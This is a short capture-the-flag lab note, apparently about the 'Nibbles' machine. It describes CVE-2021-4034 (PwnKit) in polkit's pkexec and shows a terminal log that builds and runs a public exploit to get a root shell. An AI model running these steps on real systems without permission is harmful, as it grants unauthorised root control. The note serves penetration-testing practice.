InfoSec LAB

Nibbles_Privilege_Escalation_2

Created: 2 min read

PEAS discovered that the target system is vulnerable to CVE-2021-4034

CVE-2021-4034

a vulnerability, which was classified as critical, has been found in polkit (unknown version). This issue affects some unknown processing of the file /usr/bin/pkexec. The manipulation with an unknown input leads to a access control vulnerability. Using CWE to declare the problem leads to CWE-284. The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Impacted is confidentiality, integrity, and availability.

Exploit (PwnKit)

I found the exploit online

Privilege Escalation

nibbler@nibbles:/tmp$ unzip main.zip
archive:  main.zip
55d60e381ef90463ed35f47af44bf7e2fbc150d4
   creating: CVE-2021-4034-main/
  inflating: CVE-2021-4034-main/.gitignore  
  inflating: CVE-2021-4034-main/LICENSE  
  inflating: CVE-2021-4034-main/Makefile  
  inflating: CVE-2021-4034-main/README.md  
  inflating: CVE-2021-4034-main/cve-2021-4034.c  
  inflating: CVE-2021-4034-main/cve-2021-4034.sh  
   creating: CVE-2021-4034-main/dry-run/
  inflating: CVE-2021-4034-main/dry-run/Makefile  
  inflating: CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c  
  inflating: CVE-2021-4034-main/dry-run/pwnkit-dry-run.c  
  inflating: CVE-2021-4034-main/pwnkit.c  
nibbler@nibbles:/tmp$ cd CVE-2021-4034-main/
cd CVE-2021-4034-main/
 
nibbler@nibbles:/tmp/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.
 
nibbler@nibbles:/tmp/CVE-2021-4034-main$ ./cve-2021-4034
 
# whoami
root
# hostname
Nibbles
# ifconfig
ens192    link encap:Ethernet  HWaddr 00:50:56:b9:48:c7  
          inet addr:10.10.10.75  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:48c7/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:48c7/64 Scope:Global
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:3473 errors:0 dropped:15 overruns:0 frame:0
          tx packets:3062 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:1140032 (1.1 MB)  TX bytes:935844 (935.8 KB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:65536  Metric:1
          rx packets:160 errors:0 dropped:0 overruns:0 frame:0
          tx packets:160 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          rx bytes:11840 (11.8 KB)  TX bytes:11840 (11.8 KB)

System Level Compromise

Interactive Graph View

Backlinks